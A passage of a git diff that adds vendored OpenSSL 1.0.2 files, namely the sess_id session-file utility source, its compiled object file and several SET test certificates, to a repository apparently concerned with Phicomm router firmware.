+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/bio.h>
+#include <openssl/err.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+#include <openssl/ssl.h>
+
+#undef PROG
+#define PROG    sess_id_main
+
+static const char *sess_id_usage[] = {
+    "usage: sess_id args\n",
+    "\n",
+    " -inform arg     - input format - default PEM (DER or PEM)\n",
+    " -outform arg    - output format - default PEM\n",
+    " -in arg         - input file - default stdin\n",
+    " -out arg        - output file - default stdout\n",
+    " -text           - print ssl session id details\n",
+    " -cert           - output certificate \n",
+    " -noout          - no CRL output\n",
+    " -context arg    - set the session ID context\n",
+    NULL
+};
+
+static SSL_SESSION *load_sess_id(char *file, int format);
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    SSL_SESSION *x = NULL;
+    X509 *peer = NULL;
+    int ret = 1, i, num, badops = 0;
+    BIO *out = NULL;
+    int informat, outformat;
+    char *infile = NULL, *outfile = NULL, *context = NULL;
+    int cert = 0, noout = 0, text = 0;
+    const char **pp;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+
+    argc--;
+    argv++;
+    num = 0;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-outform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-text") == 0)
+            text = ++num;
+        else if (strcmp(*argv, "-cert") == 0)
+            cert = ++num;
+        else if (strcmp(*argv, "-noout") == 0)
+            noout = ++num;
+        else if (strcmp(*argv, "-context") == 0) {
+            if (--argc < 1)
+                goto bad;
+            context = *++argv;
+        } else {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        for (pp = sess_id_usage; (*pp != NULL); pp++)
+            BIO_printf(bio_err, "%s", *pp);
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+    x = load_sess_id(infile, informat);
+    if (x == NULL) {
+        goto end;
+    }
+    peer = SSL_SESSION_get0_peer(x);
+
+    if (context) {
+        size_t ctx_len = strlen(context);
+        if (ctx_len > SSL_MAX_SID_CTX_LENGTH) {
+            BIO_printf(bio_err, "Context too long\n");
+            goto end;
+        }
+        SSL_SESSION_set1_id_context(x, (unsigned char *)context, ctx_len);
+    }
+#ifdef undef
+    /* just testing for memory leaks :-) */
+    {
+        SSL_SESSION *s;
+        char buf[1024 * 10], *p;
+        int i;
+
+        s = SSL_SESSION_new();
+
+        p = &buf;
+        i = i2d_SSL_SESSION(x, &p);
+        p = &buf;
+        d2i_SSL_SESSION(&s, &p, (long)i);
+        p = &buf;
+        d2i_SSL_SESSION(&s, &p, (long)i);
+        p = &buf;
+        d2i_SSL_SESSION(&s, &p, (long)i);
+        SSL_SESSION_free(s);
+    }
+#endif
+
+    if (!noout || text) {
+        out = BIO_new(BIO_s_file());
+        if (out == NULL) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+
+        if (outfile == NULL) {
+            BIO_set_fp(out, stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+            {
+                BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+                out = BIO_push(tmpbio, out);
+            }
+#endif
+        } else {
+            if (BIO_write_filename(out, outfile) <= 0) {
+                perror(outfile);
+                goto end;
+            }
+        }
+    }
+
+    if (text) {
+        SSL_SESSION_print(out, x);
+
+        if (cert) {
+            if (peer == NULL)
+                BIO_puts(out, "No certificate present\n");
+            else
+                X509_print(out, peer);
+        }
+    }
+
+    if (!noout && !cert) {
+        if (outformat == FORMAT_ASN1)
+            i = i2d_SSL_SESSION_bio(out, x);
+        else if (outformat == FORMAT_PEM)
+            i = PEM_write_bio_SSL_SESSION(out, x);
+        else {
+            BIO_printf(bio_err, "bad output format specified for outfile\n");
+            goto end;
+        }
+        if (!i) {
+            BIO_printf(bio_err, "unable to write SSL_SESSION\n");
+            goto end;
+        }
+    } else if (!noout && (peer != NULL)) { /* just print the certificate */
+        if (outformat == FORMAT_ASN1)
+            i = (int)i2d_X509_bio(out, peer);
+        else if (outformat == FORMAT_PEM)
+            i = PEM_write_bio_X509(out, peer);
+        else {
+            BIO_printf(bio_err, "bad output format specified for outfile\n");
+            goto end;
+        }
+        if (!i) {
+            BIO_printf(bio_err, "unable to write X509\n");
+            goto end;
+        }
+    }
+    ret = 0;
+ end:
+    if (out != NULL)
+        BIO_free_all(out);
+    if (x != NULL)
+        SSL_SESSION_free(x);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+static SSL_SESSION *load_sess_id(char *infile, int format)
+{
+    SSL_SESSION *x = NULL;
+    BIO *in = NULL;
+
+    in = BIO_new(BIO_s_file());
+    if (in == NULL) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (infile == NULL)
+        BIO_set_fp(in, stdin, BIO_NOCLOSE);
+    else {
+        if (BIO_read_filename(in, infile) <= 0) {
+            perror(infile);
+            goto end;
+        }
+    }
+    if (format == FORMAT_ASN1)
+        x = d2i_SSL_SESSION_bio(in, NULL);
+    else if (format == FORMAT_PEM)
+        x = PEM_read_bio_SSL_SESSION(in, NULL, NULL, NULL);
+    else {
+        BIO_printf(bio_err, "bad input format specified for input crl\n");
+        goto end;
+    }
+    if (x == NULL) {
+        BIO_printf(bio_err, "unable to load SSL_SESSION\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+ end:
+    if (in != NULL)
+        BIO_free(in);
+    return (x);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/sess_id.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/sess_id.o
new file mode 100644
index 0000000000000000000000000000000000000000..55e19e80e8d36c3dfdf6b008123e5fa9029fe0d5
GIT binary patch
literal 7832
zcmcJUe{2-T701V%fy2Pr=2sk`WB~&v;VxeDn}*6~e6UW>c4K3LNMJdi*XGK3&%N7&
zP(>xJ?IhbP0acBXs#2p?sT%c<Hi{}mqA7JnC<Xclq5rg?NKlc2b0v_pf;L3CzBfDL
zd$+#rACWqeXJ<b1o%iO~?!G-AjYPLksi<HwRj{wHVog%UUR_u$H}hgMt6|mbpVdn~
z4L{jt-#dl9!n?vf;hjC*_Wj?@hN?FFkA|Bl)`qv@g=L$Zs(n^mry|wtv)bsGwLr^Z
zCw8(1vQuA&jEl~;)-Og}xX?Cy*00`zdL7my>aB=+7i#mcra{4v1-MrFoNEnUN3T@B
zv<Jr4o?E3ITaSvUeS;ew9m_5%T&Nyd0<CSiqyF||1Ag9Mx7OF>*GyI~MfDx9;8s_*
z+c(BPgoep|YO&8d(A1tg>>q!*tR{e(SGgwT&s&p?%q*O-ll6<oUntw%&s*o^lao6-
zO?CMvCO6G3T(DNP<#zZrn64j}Hvfp0<J%Oq|0eY67+(<W*q6XF%r1zR@lPOgc4Pd<
zpBD;T;^-#!^$cuiwpQ5VZQ~cGz#@#^&DM!+Rxj~AhRx^g`TD5+@k!jVQ%T4q20KTq
zqV_#Ub7=V4`kIRDLM_L4QrK6|Y4(SXU_J_b+0E)X^^$s5vu|_UX1|N$*)R02$vKmD
z`fn{OiKy4}%eCBGZS+$0h#%%5RrW{fm^OUcIX3zCrN8#k>(wJy;aJI|ropiMFsC!t
zV_FW1+VHu8I`+vgwR`Vr$DSx?!=EaL=1Zf_DRsu9X*sLjFU^3JI#&II({NqPvNPfM
zk6fu9c?*_{tL2)t*?++4J|GP8w(xK9{u~eEoiKXKa}$D5d;BEcl#@1LZq&Z*7~%HD
zZ-a=B!&)D;|1Nh3$UJ5(*T6;X#F-PDXK40EQkUP|noHKtYn_>_uggZES7k+Zo)|A2
zzo>oJng1MY@@1bQE?{Qg5T++jFux02TOA`;tj8Urv#HaSj<pgtr*zrXvHY9xWDyR)
z*VOzEp$-Svf^BeSBDW(y%~=p__}zw9`{q-7!%v6zhWCZ_)4_z<pGpt1U@B`lg@nl~
zENB_eSS%Pf(vX`eXopJ5<TPs@G*gF7B{gIvQl_#ZQ^k5?eM-U{%32DViCIc!$cQKU
z6Gk5b(G*W7t60{I^(GC)N-4<{bn5Po>fMp<?zYa3Dz+lSwmCka9R=n<73)YTI0`Tp
zk6DH?lr}PkX*n)oSe`y{N{OUFJswUcz(R@3;&7bC-Rm1SLzhf!z}TW>j7&yP^eM6Q
z0L-z9DPp}4D42q!lMX6<Mt>}uw3M$!+LeaZNS6YWhw^IdE7n+c4l1RiFX`;~lG0LN
zFez{>J!P!EgelBZebM|RJ@~~AxR>0rlLcXE6DI6jCdns`TMKjVGptx53DZ~jVJPV!
zCP23bb^N##g+awkDcicDV!qsx*k!SfL2zg()&XO}aa*e*PFoe+zyHs)W81bZN<&X?
z*0i$9=Fr+uV^H0g<yG}tO^u<(b*mlh45AV)_}<57&yJ2B1`pXWWcWhB#9#7ot@vga
zt9YiSV$rPW{uB6w1;)bzxGuoX+XFSnr#v30d&$=lP>xl$1RB0KH5_Psep)!NX?Xfq
z1N(h9Dg&EZ1C8N811MSobuEFKmVh6+{;z~j&r0@jp`6B7He$lD%h8wi@`0st$;W43
z+A<TW6>QoB+&xi3`$bML@ENo^QTD;DRxbG%dMQm0@+uF{N*b03?q09ug4dR)8EX)H
zzKion0_ID?O0H-Udc~#RDELYje@t-4Ua>JO_=Y0lrR{<rcX2#Nc=|Ff-X(aOi$5v&
z_g#Fi;IF%QT<{NEJRvxSh%}{mWh$G32hWv!%)R;$S%YQ{IfwjS0QMdD!~4peFx)K1
zU-RHU_uv?Ol(Tcvga6)xpZDPJdGNn_@arD@GY>u+*0<dF=X&sk9{gbszQu#@@ZkGB
zc*27p_2579;6L@?zxLo5HkMnTKYH-Lc<>KAc)^3uf)_wJzYlrvH6EOaSR)jdC7lN$
zEEL_=h?$C66J~2MTZh?t%r;=Q5wlI0sa&Y?KASn<omAdS<vmp1S=}(<X)p$1pS~m7
z*%FTGo!hr}M|SEv!!6N>&N7JsGnQn%iIi@n)2yYfQ_tuaSMj209A*%J$d<U3PC`8$
z9~{C<Q~#jFWjwIxXOXTh9fLkSo<1^UrF4)a%z+H&T!JoA=?t2L0S)mQ>uXBrBxGZx
ztfT*McZaH@2*$`D*3#1kxWEAuB_BqA+AvDG4;WUXK4ci_5(=@13Q?af!(A8+1Ue-W
zK3ZpLSu4XZXw)5+XzDBR%SVS$j*f?!lZJ;1Ze_9z@x<`;STb2M5<Vw*W-Nn0O!&rr
z2>w1RIB7LPNO0_!0)O`fSD}mv^-JMT>Ng{VgdA;3-V9|-(vIYv4(1%+t&;B(9PQK-
z{wu-J4!+H${%yfgzk=|KgyTC^>faX}?aU%vzPH?VJ{NlA)J`qj*O<@_{;DJGKPb4{
z&U&H`5dBsU{Vt-fCi;CIdW-1sxgy8&tcU(M(PK;_^{;s7e?jzfi2f}P{Y9czi2gF+
za|ypj?5raECecqP{5IhjJInD`;)X!N^~cyu@)?9LCA^mKWrQn&<3%BS1<~U@BJFP=
z`iBXR5Pd!2PkZnL;g1mg5y8>+8p59=9AiW|p6?PnA;Nz`_@jisDL7sf!rvwwV_a$f
z6tP41>kQFTJLid>uG^nI^p^==K>S`KcBtR~5IyxfU3{Y8d7%1Q!W)VGWrX9iPR_SO
zaCD;(-b45Ugzq7CsNV$PO+^19;q-i-Abc6ozb3eQJg*ZyUFY8r{aRw@JkithdCi0W
zi*R~AXW{}w!pl1Nlk2uba2zN8tS$LUqQ~DlC0|Q8e%naiDL9^g{8o~D57BQT+$0>|
zO;UeEa2yYQ14{lJ;R@lS#17rZHwfQC^zRV<Wx~&R*#8sZ_^l|%bD8i(gx?|d@!L@9
z|4lgl$SpY(d8&XMzjo`e07-sfNgfnj#-x%zDmd;PCdm&9u5eo97?)#mzKe_eyx@4R
zVUl+43yyn-Npg&LF*WnN$ae~^x%eT$6~VD8kV8V5BZF3~mxUmDbgl<vDQzTUA^r<x
zs4r&4Sg1FXVWD&iD=1e(5F2w5Cr}C{Q*nrHL-Ew$ApEGvLT1V`Lh!pzFk{8y2St6r
z%!Y>2DTqg{Bf@}jK<`h-1`RRFFMd&=E3VZvmx*Rkm*2;-SuC@xGCWgwWSS?4Q&2D%
zfOK`bbH&&O`^xho&jH3l$i?FTN>18^hpbF;`^R?}+WeyZ@!5<v@fk{!^#8Mx&3Ck@
zljDepvfIC$=x%Bh%8IMr4E1vB#~&)tc1P%O{cw-m>(>Je$0F|sDDt#h2=UoUlN`6a
zVw^0?R5vUgQCLQ60>dqKEfafD^jDybCb!w=p%MMN`@bQC2WV#~yZe6|Sh@APgAZj$
z@|@xNVZ1N<OJ2@5_N$qJIb#>aImB2S|GDSxkFrU759}&-fV9;$G51>IZBnkkU;N;A
Lf?FwO?*9J;eL#58

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set-g-ca.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set-g-ca.pem
new file mode 100644
index 0000000..78499f0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set-g-ca.pem
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDeDCCAuGgAwIBAgIgYCYUeg8NJ9kO1q3z6vGCkAmPRfu5+Nur0FyGF79MADMw
+DQYJKoZIhvcNAQEFBQAwRTELMAkGA1UEBhMCVVMxFDASBgNVBAoTC0JDQTEwMTcx
+MTA0MSAwHgYDVQQDExdCcmFuZCBOYW1lOlByb2R1Y3QgVHlwZTAeFw05NjEwMjIw
+MDAwMDBaFw05NjExMjEyMzU5NTlaMEUxCzAJBgNVBAYTAlVTMRQwEgYDVQQKEwtQ
+Q0ExMDIxMTgyODEgMB4GA1UEAxMXQnJhbmQgTmFtZTpQcm9kdWN0IFR5cGUwgZ8w
+DQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJyi5V7l1HohY6hN/2N9x6mvWeMy8rD1
+6lfXjgmiuGmhpaszWYaalesMcS2OGuG8Lq3PkaSzpVzqASKfIOjxLMsdpYyYJRub
+vRPDWi3xd8wlp9xUwWHKqn+ki8mPo0yN4eONwZZ4rcZr6K+tWd+5EJZSjuENJoQ/
+SRRmGRzdcS7XAgMBAAGjggFXMIIBUzBUBgNVHSMETTBLoSekJTAjMQswCQYDVQQG
+EwJVUzEUMBIGA1UEChMLUkNBMTAxMTE4MjmCIGApUs14Ad7t9VTGq2PpV8DylPQ7
+aATM2mor7lc1fWvZMA4GA1UdDwEB/wQEAwIBBjAuBgNVHRABAf8EJDAigA8xOTk2
+MTAyMjAxMjIwMFqBDzE5OTYxMTIxMjM1OTU5WjAbBgNVHSABAf8EETAPMA0GC2CG
+SAGG+EUBBwEBMBIGA1UdEwEB/wQIMAYBAf8CAQAwDwYEho1vAwEB/wQEAwICBDB5
+BgSGjW8HAQH/BG4wbDAkAgEAMAkGBSsOAwIaBQAEFDJmNzRiMWFmNGZjYzA2MGY3
+Njc2Ew90ZXJzZSBzdGF0ZW1lbnSAF2h0dHA6Ly93d3cudmVyaXNpZ24uY29tgRpn
+ZXRzZXQtY2VudGVyQHZlcmlzaWduLmNvbTANBgkqhkiG9w0BAQUFAAOBgQBn19R2
+AgGvpJDmfXrHTDdCoYyMkaP2MPzw0hFRwh+wqnw0/pqUXa7MrLXMqtD3rUyOWaNR
+9fYpJZd0Bh/1OeIc2+U+VNfUovLLuZ8nNemdxyq2KMYnHtnh7UdO7atZ+PFLVu8x
+a+J2Mtj8MGy12CJNTJcjLSrJ/1f3AuVrwELjlQ==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set-m-ca.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set-m-ca.pem
new file mode 100644
index 0000000..0e74caf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set-m-ca.pem
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDeDCCAuGgAwIBAgIgEGvcf5aUnufALdVMa/dmPdflq1CoORGeK5DUwbqhVYcw
+DQYJKoZIhvcNAQEFBQAwRTELMAkGA1UEBhMCVVMxFDASBgNVBAoTC0JDQTEwMTcx
+MTA0MSAwHgYDVQQDExdCcmFuZCBOYW1lOlByb2R1Y3QgVHlwZTAeFw05NjEwMjIw
+MDAwMDBaFw05NjExMjEyMzU5NTlaMEUxCzAJBgNVBAYTAlVTMRQwEgYDVQQKEwtN
+Q0ExMDIxMTgyNzEgMB4GA1UEAxMXQnJhbmQgTmFtZTpQcm9kdWN0IFR5cGUwgZ8w
+DQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALuWwr63YrT1GIZpYKfIeiVFHESG/FZO
+7RAJKml/p12ZyZ7D5YPP4BBXVsa1H8e8arR1LKC4rdCArrtKKlBeBiMo9+NB+u35
+FnLnTmfzM4iZ2Syw35DXY8+Xn/LM7RJ1RG+vMNcTqpoUg7QPye7flq2Pt7vVROPn
+SZxPyVxmILe3AgMBAAGjggFXMIIBUzBUBgNVHSMETTBLoSekJTAjMQswCQYDVQQG
+EwJVUzEUMBIGA1UEChMLUkNBMTAxMTE4MjmCIGApUs14Ad7t9VTGq2PpV8DylPQ7
+aATM2mor7lc1fWvZMA4GA1UdDwEB/wQEAwIBBjAuBgNVHRABAf8EJDAigA8xOTk2
+MTAyMjAxMjEwMFqBDzE5OTYxMTIxMjM1OTU5WjAbBgNVHSABAf8EETAPMA0GC2CG
+SAGG+EUBBwEBMBIGA1UdEwEB/wQIMAYBAf8CAQAwDwYEho1vAwEB/wQEAwIDCDB5
+BgSGjW8HAQH/BG4wbDAkAgEAMAkGBSsOAwIaBQAEFDJmNzRiMWFmNGZjYzA2MGY3
+Njc2Ew90ZXJzZSBzdGF0ZW1lbnSAF2h0dHA6Ly93d3cudmVyaXNpZ24uY29tgRpn
+ZXRzZXQtY2VudGVyQHZlcmlzaWduLmNvbTANBgkqhkiG9w0BAQUFAAOBgQApaj0W
+GgyR47URZEZ7z83yivvnVErqtodub/nR1fMgJ4bDC0ofjA0SzXBP1/3eDq9VkPuS
+EKUw9BpM2XrSUKhJ6F1CbBjWpM0M7GC1nTSxMxmV+XL+Ab/Gn2SwozUApWtht29/
+x9VLB8qsi6wN2aOsVdQMl5iVCjGQYfEkyuoIgA==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_b_ca.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_b_ca.pem
new file mode 100644
index 0000000..eba7d5c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_b_ca.pem
@@ -0,0 +1,23 @@
+-----BEGIN CERTIFICATE-----
+MIID1zCCAr+gAwIBAgIgYClSzXgB3u31VMarY+lXwPKU9DtoBMzaaivuVzV9a9kw
+DQYJKoZIhvcNAQEFBQAwIzELMAkGA1UEBhMCVVMxFDASBgNVBAoTC1JDQTEwMTEx
+ODI5MB4XDTk2MTAxNzAwMDAwMFoXDTk2MTExNjIzNTk1OVowRTELMAkGA1UEBhMC
+VVMxFDASBgNVBAoTC0JDQTEwMTcxMTA0MSAwHgYDVQQDExdCcmFuZCBOYW1lOlBy
+b2R1Y3QgVHlwZTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApPewvR0BwV02
+9E12ic48pMY/aMB6SkMEWPDx2hURr0DKYGJ6qMvzZn2pSfaVH1BqDtK6oK4Ye5Mj
+ItywwQIdXXO9Ut8+TLnvtzq9ByCJ0YThjZJBc7ZcpJxSV7QAoBON/lzxZuAVq3+L
+3uc39MgRwmBpRllZEpWrkojxs6166X0CAwEAAaOCAVcwggFTMFQGA1UdIwRNMEuh
+J6QlMCMxCzAJBgNVBAYTAlVTMRQwEgYDVQQKEwtSQ0ExMDExMTgyOYIgVqenwCYv
+mmxUIvi9gUMCa+uJGJ60mZecw9HrISXnLaYwDgYDVR0PAQH/BAQDAgEGMC4GA1Ud
+EAEB/wQkMCKADzE5OTYxMDE3MTc1NzAwWoEPMTk5NjExMTYyMzU5NTlaMBsGA1Ud
+IAEB/wQRMA8wDQYLYIZIAYb4RQEHAQEwEgYDVR0TAQH/BAgwBgEB/wIBATAPBgSG
+jW8DAQH/BAQDAgABMHkGBIaNbwcBAf8EbjBsMCQCAQAwCQYFKw4DAhoFAAQUMmY3
+NGIxYWY0ZmNjMDYwZjc2NzYTD3RlcnNlIHN0YXRlbWVudIAXaHR0cDovL3d3dy52
+ZXJpc2lnbi5jb22BGmdldHNldC1jZW50ZXJAdmVyaXNpZ24uY29tMA0GCSqGSIb3
+DQEBBQUAA4IBAQAWoMS8Aj2sO0LDxRoMcnWTKY8nd8Jw2vl2Mgsm+0qCvcndICM5
+43N0y9uHlP8WeCZULbFz95gTL8mfP/QTu4EctMUkQgRHJnx80f0XSF3HE/X6zBbI
+9rit/bF6yP1mhkdss/vGanReDpki7q8pLx+VIIcxWst/366HP3dW1Fb7ECW/WmVV
+VMN93f/xqk9I4sXchVZcVKQT3W4tzv+qQvugrEi1dSEkbAy1CITEAEGiaFhGUyCe
+WPox3guRXaEHoINNeajGrISe6d//alsz5EEroBoLnM2ryqWfLAtRsf4rjNzTgklw
+lbiz0fw7bNkXKp5ZVr0wlnOjQnoSM6dTI0AV
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_c_ca.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_c_ca.pem
new file mode 100644
index 0000000..48b2cbd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_c_ca.pem
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDeDCCAuGgAwIBAgIgOnl8J6lAYNDdTWtIojWCGnloNf4ufHjOZ4Fkxwg5xOsw
+DQYJKoZIhvcNAQEFBQAwRTELMAkGA1UEBhMCVVMxFDASBgNVBAoTC0JDQTEwMTcx
+MTA0MSAwHgYDVQQDExdCcmFuZCBOYW1lOlByb2R1Y3QgVHlwZTAeFw05NjEwMjIw
+MDAwMDBaFw05NjExMjEyMzU5NTlaMEUxCzAJBgNVBAYTAlVTMRQwEgYDVQQKEwtD
+Q0ExMDIxMTYxNjEgMB4GA1UEAxMXQnJhbmQgTmFtZTpQcm9kdWN0IFR5cGUwgZ8w
+DQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANA3a9+U8oXU3Dv1wJf8g0A7HjCRZAXc
+Y8E4OLOdye5aUssxifCE05qTPVqHMXo6cnCYcfroMdURhjQlswyTGtjQybgUnXjp
+pchw+V4D1DkN0ThErrMCh9ZFSykC0lUhQTRLESvbIb4Gal/HMAFAF5sj0GoOFi2H
+RRj7gpzBIU3xAgMBAAGjggFXMIIBUzBUBgNVHSMETTBLoSekJTAjMQswCQYDVQQG
+EwJVUzEUMBIGA1UEChMLUkNBMTAxMTE4MjmCIGApUs14Ad7t9VTGq2PpV8DylPQ7
+aATM2mor7lc1fWvZMA4GA1UdDwEB/wQEAwIBBjAuBgNVHRABAf8EJDAigA8xOTk2
+MTAyMjAxMTAwMFqBDzE5OTYxMTIxMjM1OTU5WjAbBgNVHSABAf8EETAPMA0GC2CG
+SAGG+EUBBwEBMBIGA1UdEwEB/wQIMAYBAf8CAQAwDwYEho1vAwEB/wQEAwIEEDB5
+BgSGjW8HAQH/BG4wbDAkAgEAMAkGBSsOAwIaBQAEFDJmNzRiMWFmNGZjYzA2MGY3
+Njc2Ew90ZXJzZSBzdGF0ZW1lbnSAF2h0dHA6Ly93d3cudmVyaXNpZ24uY29tgRpn
+ZXRzZXQtY2VudGVyQHZlcmlzaWduLmNvbTANBgkqhkiG9w0BAQUFAAOBgQBteLaZ
+u/TASC64UWPfhxYAUdys9DQ1pG/J1qPWNTkjOmpXFvW+7l/3nkxyRPgUoFNwx1e7
+XVVPr6zhy8LaaXppwfIZvVryzAUdbtijiUf/MO0hvV3w7e9NlCVProdU5H9EvCXr
++IV8rH8fdEkirIVyw0JGHkuWhkmtS1HEwai9vg==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_d_ct.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_d_ct.pem
new file mode 100644
index 0000000..9f8c7d8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_d_ct.pem
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDdjCCAt+gAwIBAgIgRU5t24v72xVDpZ4iHpyoOAQaQmfio1yhTZAOkBfT2uUw
+DQYJKoZIhvcNAQEFBQAwRTELMAkGA1UEBhMCVVMxFDASBgNVBAoTC0NDQTEwMjEx
+NjE2MSAwHgYDVQQDExdCcmFuZCBOYW1lOlByb2R1Y3QgVHlwZTAeFw05NjEwMjQw
+MDAwMDBaFw05NjExMjMyMzU5NTlaMG4xCzAJBgNVBAYTAlVTMRAwDgYDVQQKEwdC
+cmFuZElEMSYwJAYDVQQLEx1Jc3N1aW5nIEZpbmFuY2lhbCBJbnN0aXR1dGlvbjEl
+MCMGA1UEAxMcR2lYb0t0VjViN1V0MHZKa2hkSG5RYmNzc2JrPTBcMA0GCSqGSIb3
+DQEBAQUAA0sAMEgCQQDIUxgpNB1aoSW585WErtN8WInCRWCqDj3RGT2mJye0F4SM
+/iT5ywdWMasmw18vpEpDlMypfZnRkUAdfyHcRABVAgMBAAGjggFwMIIBbDB2BgNV
+HSMEbzBtoUmkRzBFMQswCQYDVQQGEwJVUzEUMBIGA1UEChMLQkNBMTAxNzExMDQx
+IDAeBgNVBAMTF0JyYW5kIE5hbWU6UHJvZHVjdCBUeXBlgiA6eXwnqUBg0N1Na0ii
+NYIaeWg1/i58eM5ngWTHCDnE6zAOBgNVHQ8BAf8EBAMCB4AwLgYDVR0QAQH/BCQw
+IoAPMTk5NjEwMjQwMTA0MDBagQ8xOTk2MTEyMzIzNTk1OVowGAYDVR0gBBEwDzAN
+BgtghkgBhvhFAQcBATAMBgNVHRMBAf8EAjAAMA8GBIaNbwMBAf8EBAMCB4AweQYE
+ho1vBwEB/wRuMGwwJAIBADAJBgUrDgMCGgUABBQzOTgyMzk4NzIzNzg5MTM0OTc4
+MhMPdGVyc2Ugc3RhdGVtZW50gBdodHRwOi8vd3d3LnZlcmlzaWduLmNvbYEaZ2V0
+c2V0LWNlbnRlckB2ZXJpc2lnbi5jb20wDQYJKoZIhvcNAQEFBQADgYEAVHCjhxeD
+mIFSkm3DpQAq7pGfcAFPWvSM9I9bK8qeFT1M5YQ+5fbPqaWlNcQlGKIe3cHd4+0P
